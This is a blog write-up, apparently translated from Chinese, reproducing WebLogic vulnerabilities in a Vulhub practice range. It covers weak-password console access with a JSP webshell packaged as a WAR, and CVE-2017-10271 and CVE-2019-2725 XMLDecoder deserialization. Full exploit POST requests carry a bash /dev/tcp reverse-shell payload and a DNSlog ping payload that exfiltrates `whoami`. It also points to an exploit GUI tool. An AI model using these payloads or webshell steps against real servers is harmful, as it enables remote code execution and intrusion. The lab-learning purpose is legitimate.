weblogic Vulnerability Reappearance in Vulhub Shooting Range


WebLogic is an application server produced by Oracle Corporation in the United States. To be precise, it is a middleware based on JAVAEE architecture. WebLogic is a Java application server for developing, integrating, deploying and managing large-scale distributed Web applications, network applications and database applications. Introduce the dynamic functions of Java and the security of Java Enterprise standard into the development, integration, deployment and management of large-scale network applications.

WebLogic is one of the main products of American Oracle, which was acquired through the acquisition of BEA. It is one of the main Java (J2EE) application server software (application server) in the commercial market, and it is the world's first successful commercialized J2EE application server, which has been released to version 12c( And this product also extends WebLogic Portal, WebLogic Integration and other enterprise middleware (but at present Oracle mainly replaces these enterprise packages other than WebLogic Server with Fusion Middleware fusion middleware), and OEPE(Oracle Enterprise Pack for Eclipse) development tool.

rce caused by weak password login

docker pull image

docker-compose up -d

Log in to port 7001

Splicing url

Weak password login

If the number of weak password errors exceeds five times, it will be locked, so use a weak password to log in here

Successfully logged in here

Make war package

Create a separate folder, which contains the jsp Trojan horse of Ice Scorpion 3

Open cmd and enter jar -cvf aaa.war .
Package the current directory into a war package

Upload war package

Click to deploy

I failed to connect to the Ice Scorpion here, so I re-uploaded a Godzilla one, and the steps are the same.

successfully connected.

CVE-2017-3506/10271 XMLDecoder deserialization vulnerability

Splice the following URL s, and if the echo is displayed as shown in the figure below, it can be judged that the wls-wsat component exists.









linux rebound shell

Refresh the packet capture page directly, and then modify the packet. This is the original packet. Then first change the GET type to POST type, and there is a function after right-clicking on burp that specifically converts the data packet format.

After changing to a POST-type data packet, some construction is required to successfully RCE. The Content-Type needs to be equal to text/xml, otherwise XMLDecoder may not parse it. The following is the constructed data package.

POST /wls-wsat/CoordinatorPortType HTTP/1.1


User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Connection: close

Cookie: ADMINCONSOLESESSION=CsBPjQgJv12n5Gn6sHQhTXT74KQ0yrhXn0JC2XKlJqKY7bdsZqP4!-1250251804

Upgrade-Insecure-Requests: 1

Content-Type: text/xml

Content-Length: 640

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<java version="1.4.0" class="java.beans.XMLDecoder">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">



<void index="1">



<void index="2">

<string>bash -i &gt;&amp; /dev/tcp/ 0&gt;&amp;1</string>



<void method="start"/></void>







The picture below is the package after the above construction, and then put the package

This interface will appear after unpacking

Successfully rebound the shell

cve-2017-10271 and 3506 have the same vulnerability principle, except that 10271 bypasses the 3506 patch

CVE-2019-2725 wls-wsat deserialization remote code execution vulnerability

Vulnerability introduction:

This vulnerability is actually another entry of CVE-2017-10271. The patch of CVE-2017-3506 filters object; the patch of CVE-2017-10271 filters new and method tags, and void can only be followed by index and array. It can only follow the class of byte type; the patch of CVE-2019-2725 filters the class and limits the byte length in the array tag.

Affected components:


Sphere of influence:,

Authentication vulnerability:

access /_async/AsyncResponseService,If it returns 200, it exists, and if it returns 404, it does not exist:




Dnslog verify shell

Refresh directly to capture the packet, and then modify the data packet. Like the previous one, you need to convert the GET-type data packet into a POST-type data packet, and then modify the structure.

POST /_async/AsyncResponseService HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 859
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<void index="1">
<void index="2">
<string>ping `whoami`.tsqohg.dnslog.cn</string>
<void method="start"/></void>

Use the package constructed above, and then send the package, 202 means successful execution

Received a message here, indicating that there is a vulnerability

CVE-2020-14882 Unauthorized access

Splice the following URL s to log in. If you can access successfully, it means that there is an unauthorized access vulnerability.

tool use


When using xray to scan, you need to scan the root directory directly. If you scan the vulnerability page directly, you will not be able to scan the vulnerability. However, there are many vulnerabilities in this shooting range. This scan is still not comprehensive. The following is the scanned page.


scan results


This tool is the same as the case of xray, directly accessing the vulnerability connection, it is impossible to scan out the vulnerability, and the root directory must be scanned.

The above is a scan of the vulnerable page, and there is no result.

The following is a scan of the root directory, with three results.


The tool only supports direct exploits.

project address: GitHub - sp4zcmd/WeblogicExploit-GUI: A graphical tool for exploiting Weblogic vulnerabilities, supporting memory horse injection, one-click webshell upload, and command execution


connection succeeded

Tags: Cyber Security security Web Security

Posted by Jalz on Wed, 22 Mar 2023 10:02:51 +0530